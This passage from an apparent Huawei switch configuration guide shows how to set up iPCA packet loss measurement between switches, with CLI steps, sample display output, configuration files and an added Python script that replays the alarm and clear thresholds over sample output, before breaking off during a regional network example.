symmetrical flow, so it is logically divided into two unidirectional flows.
2. Configure Switch_1 as DCP1. Bind GE1/0/1 where the target flow passes to in-point
ingress TLP of DCP1. Define instance 1 on DCP1 to collect statistics data of the target
flow from TLPs.
3. Configure Switch_2 as DCP2. Bind GE1/0/1 where the target flow passes to out-point
egress TLP of DCP2. Define instance 1 on DCP2 to collect statistics data of the target
flow from TLPs.
4. Configure Switch_2 as the MCP to aggregate statistics data from DCP1 and DCP2 and
export the statistics result. Configure packet loss alarm thresholds to help users predict
network faults. When the packet loss ratio exceeds 7%, an alarm is reported; when the
packet loss ratio falls below 5%, a clear alarm is reported.
5. Retain the default values of color bit, measurement interval, and UDP port number used
for communication between DCPs and MCP.

NOTE

Before configuring iPCA to implement end-to-end packet loss measurement, ensure that static routes or
dynamic routing protocols have been configured to implement network connectivity between Switch_1
and Switch_2.
Before configuring iPCA to implement end-to-end packet loss measurement, ensure that NTP has been
configured to implement time synchronization between Switch_1 and Switch_2.

Procedure
Step 1 Configure Switch_1 as DCP1, set the DCP ID of Switch_1 to the router ID 1.1.1.1, and
configure TLP 1.

<HUAWEI> system-view
[HUAWEI] sysname Switch_1
[Switch_1] nqa ipfpm dcp //Enable the global DCP function.
[Switch_1-nqa-ipfpm-dcp] dcp id 1.1.1.1 //Set the DCP ID to 1.1.1.1.
[Switch_1-nqa-ipfpm-dcp] instance 1 //Create measurement instance 1 on the DCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2 //Associate measurement instance 1 with an MCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24 //Configure the target flow in measurement instance 1 as a bidirectional symmetrical flow with the source address segment 10.1.1.0 and destination address segment 10.2.1.0.
[Switch_1-nqa-ipfpm-dcp-instance-1] tlp 1 in-point ingress //Set the TLP ID to 1 and configure the TLP to color the incoming target flow. The target flow arrives at the TLP.
[Switch_1-nqa-ipfpm-dcp-instance-1] quit
[Switch_1-nqa-ipfpm-dcp] quit
[Switch_1] interface gigabitethernet 1/0/1
[Switch_1-GigabitEthernet1/0/1] ipfpm tlp 1 //Bind the interface to the TLP.
[Switch_1-GigabitEthernet1/0/1] quit
[Switch_1] nqa ipfpm dcp
[Switch_1-nqa-ipfpm-dcp] instance 1
[Switch_1-nqa-ipfpm-dcp-instance-1] loss-measure enable continual //Enable continual packet loss measurement.
[Switch_1-nqa-ipfpm-dcp-instance-1] quit
[Switch_1-nqa-ipfpm-dcp] quit

Step 2 Configure Switch_2 as DCP2, set the DCP ID of Switch_2 to the router ID 2.2.2.2, and
configure TLP 2.
<HUAWEI> system-view
[HUAWEI] sysname Switch_2
[Switch_2] nqa ipfpm dcp
[Switch_2-nqa-ipfpm-dcp] dcp id 2.2.2.2
[Switch_2-nqa-ipfpm-dcp] instance 1
[Switch_2-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2
[Switch_2-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24
[Switch_2-nqa-ipfpm-dcp-instance-1] tlp 2 out-point egress
[Switch_2-nqa-ipfpm-dcp-instance-1] quit
[Switch_2-nqa-ipfpm-dcp] quit
[Switch_2] interface gigabitethernet 1/0/1
[Switch_2-GigabitEthernet1/0/1] ipfpm tlp 2
[Switch_2-GigabitEthernet1/0/1] quit
[Switch_2] nqa ipfpm dcp
[Switch_2-nqa-ipfpm-dcp] instance 1
[Switch_2-nqa-ipfpm-dcp-instance-1] loss-measure enable continual
[Switch_2-nqa-ipfpm-dcp-instance-1] quit
[Switch_2-nqa-ipfpm-dcp] quit

Step 3 Configure Switch_2 as the MCP.


[Switch_2] nqa ipfpm mcp //Enable the global MCP function.
[Switch_2-nqa-ipfpm-mcp] mcp id 2.2.2.2 //Set the MCP ID to 2.2.2.2.
[Switch_2-nqa-ipfpm-mcp] instance 1 //Create measurement instance 1 on the MCP.
[Switch_2-nqa-ipfpm-mcp-instance-1] dcp 1.1.1.1 //Associate measurement instance 1 with the DCP whose ID is 1.1.1.1.
[Switch_2-nqa-ipfpm-mcp-instance-1] dcp 2.2.2.2 //Associate measurement instance 1 with the DCP whose ID is 2.2.2.2.
[Switch_2-nqa-ipfpm-mcp-instance-1] loss-measure ratio-threshold upper-limit 7 lower-limit 5 //Set the packet loss alarm threshold to 7% and the clear alarm threshold to 5%.
[Switch_2-nqa-ipfpm-mcp-instance-1] quit
[Switch_2-nqa-ipfpm-mcp] quit
[Switch_2] quit

Step 4 Verify the configuration.

# Run the display ipfpm statistic-type loss instance 1 command on Switch_2 that functions
as the MCP to view the packet loss measurement result.

<Switch_2> display ipfpm statistic-type loss instance 1

Latest loss statistics of forward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------------------
Period          Loss(p)      LossRatio(p)    Loss(b)        LossRatio(b)
------------------------------------------------------------------------------------------
127636768       381549       4.514649%       40444194       4.514649%
127636767       381528       4.514620%       40441968       4.514620%
127636766       381318       4.514996%       40419708       4.514996%
127636765       381192       4.514686%       40406352       4.514686%
127636764       381381       4.514679%       40426386       4.514679%
127636763       381402       4.514748%       40428612       4.514748%
127636762       381081       4.514797%       40394586       4.514797%
127636761       381324       4.514702%       40420344       4.514702%
127636760       381549       4.514870%       40444194       4.514870%
127636759       381066       4.514638%       40392996       4.514638%
127636758       381570       4.514836%       40446420       4.514836%
127636757       382452       4.514757%       40539912       4.514757%

Latest loss statistics of backward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------------------
Period          Loss(p)      LossRatio(p)    Loss(b)        LossRatio(b)
------------------------------------------------------------------------------------------
127636768       381087       4.513306%       40395222       4.513306%
127636767       381129       4.513384%       40399674       4.513384%
127636766       381465       4.513444%       40435290       4.513444%
127636765       381087       4.513222%       40395222       4.513222%
127636764       381045       4.513272%       40390770       4.513272%
127636763       381381       4.513364%       40426386       4.513364%
127636762       381276       4.513435%       40415256       4.513435%
127636761       380961       4.513280%       40381866       4.513280%
127636760       381339       4.513574%       40421934       4.513574%
127636759       381045       4.513270%       40390770       4.513270%
127636758       381088       4.513226%       40395328       4.513226%
127636757       382409       4.513464%       40535354       4.513464%

----End
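The MCP raises an alarm when the loss ratio exceeds the upper limit and clears it only when the ratio falls below the lower limit, so ratios between the two thresholds keep the current state. The script below is an added example, not Huawei's code, that reproduces that hysteresis on the per-period rows of the display ipfpm statistic-type loss output shown in Step 4, so an operator pulling this output into a monitoring system can replay the alarm decisions offline. The thresholds are parameters, so the same code covers the 5%/3% setting used in the regional network example (18.4.2). SAMPLE_OUTPUT is constructed in the layout of the command output; its periods walk the ratio above 7% and back below 5%, and the row values are invented.

```python
"""Replay iPCA packet loss alarm/clear hysteresis over display output.

Added example, not Huawei's code. Parses the per-period rows of
'display ipfpm statistic-type loss instance N' and applies the
'loss-measure ratio-threshold upper-limit U lower-limit L' semantics.
"""
import re

FLOW_RE = re.compile(r"^Latest loss statistics of (\w+) flow:")
ROW_RE = re.compile(r"^(\d+)\s+(\d+)\s+([\d.]+)%\s+(\d+)\s+([\d.]+)%")

# Constructed sample output (values invented); latest period is listed first,
# as the real command does.
SAMPLE_OUTPUT = """\
Latest loss statistics of forward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------------------
Period          Loss(p)      LossRatio(p)    Loss(b)        LossRatio(b)
------------------------------------------------------------------------------------------
127636768       388900       4.600000%       41223400       4.600000%
127636767       405800       4.800000%       43014800       4.800000%
127636766       465000       5.500000%       49290000       5.500000%
127636765       524200       6.200000%       55565200       6.200000%
127636764       684800       8.100000%       72588800       8.100000%
127636763       625600       7.400000%       66313600       7.400000%
127636762       583300       6.900000%       61829800       6.900000%
127636761       382100       4.520000%       40502600       4.520000%
127636760       381300       4.510000%       40417800       4.510000%

Latest loss statistics of backward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------------------
Period          Loss(p)      LossRatio(p)    Loss(b)        LossRatio(b)
------------------------------------------------------------------------------------------
127636768       381087       4.513306%       40395222       4.513306%
127636767       381129       4.513384%       40399674       4.513384%
127636766       381465       4.513444%       40435290       4.513444%
"""


def parse_loss_output(text):
    """Return {flow: [(period, loss_p, ratio_p, loss_b, ratio_b), ...]} sorted oldest period first."""
    flows, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        fm = FLOW_RE.match(line)
        if fm:
            current = fm.group(1)
            flows[current] = []
            continue
        rm = ROW_RE.match(line)
        if rm and current is not None:
            period, loss_p, ratio_p, loss_b, ratio_b = rm.groups()
            flows[current].append((int(period), int(loss_p), float(ratio_p), int(loss_b), float(ratio_b)))
    for rows in flows.values():
        rows.sort(key=lambda r: r[0])   # the command lists latest first; evaluate in time order
    return flows


def hysteresis_events(rows, upper=7.0, lower=5.0):
    """Replay rows oldest-first; return (period, packet loss ratio, 'ALARM'|'CLEAR') transitions only."""
    in_alarm, events = False, []
    for period, _loss_p, ratio_p, _loss_b, _ratio_b in rows:
        if not in_alarm and ratio_p > upper:        # ratio exceeds the upper limit: alarm
            in_alarm = True
            events.append((period, ratio_p, "ALARM"))
        elif in_alarm and ratio_p < lower:          # ratio falls below the lower limit: clear
            in_alarm = False
            events.append((period, ratio_p, "CLEAR"))
        # anything between the limits leaves the state unchanged
    return events


def evaluate(text, upper=7.0, lower=5.0):
    """Alarm/clear transitions per flow for a complete display output."""
    return {flow: hysteresis_events(rows, upper, lower)
            for flow, rows in parse_loss_output(text).items()}


if __name__ == "__main__":
    for flow, events in evaluate(SAMPLE_OUTPUT).items():
        print(flow, events or "no threshold crossings")
```

In the constructed forward flow the alarm is raised at period 127636763 (7.4%) and, although later periods drop to 6.2% and 5.5%, it is cleared only at 127636767 (4.8%); the backward flow never crosses a threshold. With the 5%/3% thresholds of the regional example the alarm is raised one period earlier, at 6.9%, and never clears within the sample.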


Configuration Files
l Configuration file of Switch_1
#
sysname Switch_1
#
interface GigabitEthernet1/0/1
ipfpm tlp 1
#
nqa ipfpm dcp
dcp id 1.1.1.1
instance 1
mcp 2.2.2.2
flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24
tlp 1 in-point ingress
loss-measure enable continual
#
return

l Configuration file of Switch_2


#
sysname Switch_2
#
interface GigabitEthernet1/0/1
ipfpm tlp 2
#
nqa ipfpm dcp
dcp id 2.2.2.2
instance 1
mcp 2.2.2.2
flow bidirectional source 10.1.1.0 24 destination 10.2.1.0 24
tlp 2 out-point egress
loss-measure enable continual
#
nqa ipfpm mcp
mcp id 2.2.2.2
instance 1
dcp 1.1.1.1
dcp 2.2.2.2
loss-measure ratio-threshold upper-limit 7.000000 lower-limit 5.000000
#
return

18.4.2 Example for Configuring iPCA to Implement Regional Network Packet Loss Measurement

iPCA Overview
Packet Conservation Algorithm for Internet (iPCA) technology is used to measure IP network
performance. It directly marks service packets to implement network-level and device-level
packet loss measurements.

In the all-IP era, various services sensitive to packet loss, such as voice and video services, are
transmitted through an IP network. To detect packet loss and find out packet loss points on the
network, Huawei developed iPCA technology. Huawei iPCA has the following
characteristics:

l iPCA applies to both Layer 2 and Layer 3 networks.
l iPCA directly marks service packets to obtain the packet loss ratio and number of lost
packets, without increasing loads on devices.
l iPCA supports packet loss statistics collection on multipoint-to-multipoint networks.


Regional network packet loss measurement: Statistics are not collected on edge devices that
are out of the transit network. This method is applicable to packet loss measurement on a
WAN when an enterprise has multiple networks connected through the WAN or on an
enterprise campus network consisting of devices that do not support iPCA.

Configuration Notes
l A modular switch can support iPCA only after being equipped with an X1E card.
l The prerequisite for network-level packet loss measurement is time synchronization
among all devices. Therefore, before configuring iPCA on devices, configure the
Network Time Protocol (NTP) on the devices.
l In network-level packet loss measurement, target flows can be defined by users.
l In network-level packet loss measurement, the current version can only measure known
IP unicast packets but cannot measure unknown IP unicast packets. If unknown IP
unicast packets are measured, the measurement result may be inaccurate.
l Network-level packet loss measurement is based on target flows. If the packet content is
modified (for example, NAT is performed on packets, packets are encapsulated in
tunnels, and packet priority is changed), the device cannot precisely match the packets,
so the measurement result may be inaccurate.

Table 18-7 Applicable product models and versions

Product Model        Software Version
S12704               V200R008C00, V200R009C00
S12708 and S12712    V200R006C00, V200R007C00, V200R007C20, V200R008C00, and V200R009C00

Networking Requirements
As shown in Figure 18-19, an enterprise leases a dedicated line from the carrier to transmit
important services between headquarters and branches over the WAN. The source address
segment is 10.1.1.0/24 and the destination address segment is 10.2.0.0/16. The service
packets of the enterprise pass through a large number of the carrier's public routing and
switching devices. The enterprise considers the dedicated line expensive and wants packet
loss data for the WAN so that it can ask the carrier to improve service quality.


Figure 18-19 Networking diagram of regional network packet loss measurement
[Figure: egress Switch_1 (GE1/0/1) of Branch 1 and egress Switch_2 (GE1/0/1) of Branch 2
connect over the leased line to egress Switch_3 (GE1/0/1) of the Headquarters; Switch_4 is
the NMS device in the headquarters. The target flow runs from the branches to the
headquarters.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the important service flow (source address segment 10.1.1.0/24 and
destination address segment 10.2.0.0/16) transmitted over the dedicated line as the target
flow. It is a unidirectional service flow.
2. Configure egress devices Switch_1 and Switch_2 as DCPs. Bind GE1/0/1 where the
target flow passes to out-point ingress TLPs of DCPs. Define measurement instance 1 on
Switch_1 and Switch_2 to collect statistics data of the target flow from TLPs.
3. Configure egress device Switch_3 as a DCP. Bind GE1/0/1 where the target flow passes
to in-point egress TLP of the DCP. Define instance 1 on Switch_3 to collect statistics
data of the target flow from TLPs.
4. Configure Switch_4 in the headquarters network management center as the MCP to
collect the statistics data from DCPs. Configure packet loss alarm and clear alarm
thresholds. When the packet loss ratio exceeds 5%, an alarm is reported; when the packet
loss ratio falls below 3%, a clear alarm is reported.
5. Retain the default values of color bit, measurement interval, and UDP port number.

NOTE

Before configuring iPCA to implement regional network packet loss measurement, ensure that static
routes or dynamic routing protocols have been configured to implement network connectivity between
Switch_1, Switch_2, Switch_3, and Switch_4.
Before configuring iPCA to implement regional network packet loss measurement, ensure that NTP has
been configured to implement time synchronization between Switch_1, Switch_2, and Switch_3.

Procedure
Step 1 Configure Switch_1 as DCP1, set the DCP ID of Switch_1 to the router ID 1.1.1.1, and
configure TLP 1.
<HUAWEI> system-view
[HUAWEI] sysname Switch_1
[Switch_1] nqa ipfpm dcp //Enable the global DCP function.
[Switch_1-nqa-ipfpm-dcp] dcp id 1.1.1.1 //Set the DCP ID to 1.1.1.1.
[Switch_1-nqa-ipfpm-dcp] instance 1 //Create measurement instance 1 on the DCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] mcp 4.4.4.4 //Associate measurement instance 1 with an MCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] flow forward source 10.1.1.0 24 destination 10.2.0.0 16 //Configure the target flow in measurement instance 1 as a forward flow with the source address segment 10.1.1.0 and destination address segment 10.2.0.0.
[Switch_1-nqa-ipfpm-dcp-instance-1] tlp 1 out-point ingress //Set the TLP ID to 1 and configure the TLP to color the outgoing target flow. The target flow arrives at the TLP.
[Switch_1-nqa-ipfpm-dcp-instance-1] quit
[Switch_1-nqa-ipfpm-dcp] quit
[Switch_1] interface gigabitethernet 1/0/1
[Switch_1-GigabitEthernet1/0/1] ipfpm tlp 1 //Bind the interface to the TLP.
[Switch_1-GigabitEthernet1/0/1] quit
[Switch_1] nqa ipfpm dcp
[Switch_1-nqa-ipfpm-dcp] instance 1
[Switch_1-nqa-ipfpm-dcp-instance-1] loss-measure enable continual //Enable continual packet loss measurement.
[Switch_1-nqa-ipfpm-dcp-instance-1] quit
[Switch_1-nqa-ipfpm-dcp] quit

Step 2 Configure Switch_2 as DCP2, set the DCP ID of Switch_2 to the router ID 2.2.2.2, and
configure TLP 2.
<HUAWEI> system-view
[HUAWEI] sysname Switch_2
[Switch_2] nqa ipfpm dcp
[Switch_2-nqa-ipfpm-dcp] dcp id 2.2.2.2
[Switch_2-nqa-ipfpm-dcp] instance 1
[Switch_2-nqa-ipfpm-dcp-instance-1] mcp 4.4.4.4
[Switch_2-nqa-ipfpm-dcp-instance-1] flow forward source 10.1.1.0 24 destination 10.2.0.0 16
[Switch_2-nqa-ipfpm-dcp-instance-1] tlp 2 out-point ingress
[Switch_2-nqa-ipfpm-dcp-instance-1] quit
[Switch_2-nqa-ipfpm-dcp] quit
[Switch_2] interface gigabitethernet 1/0/1
[Switch_2-GigabitEthernet1/0/1] ipfpm tlp 2
[Switch_2-GigabitEthernet1/0/1] quit
[Switch_
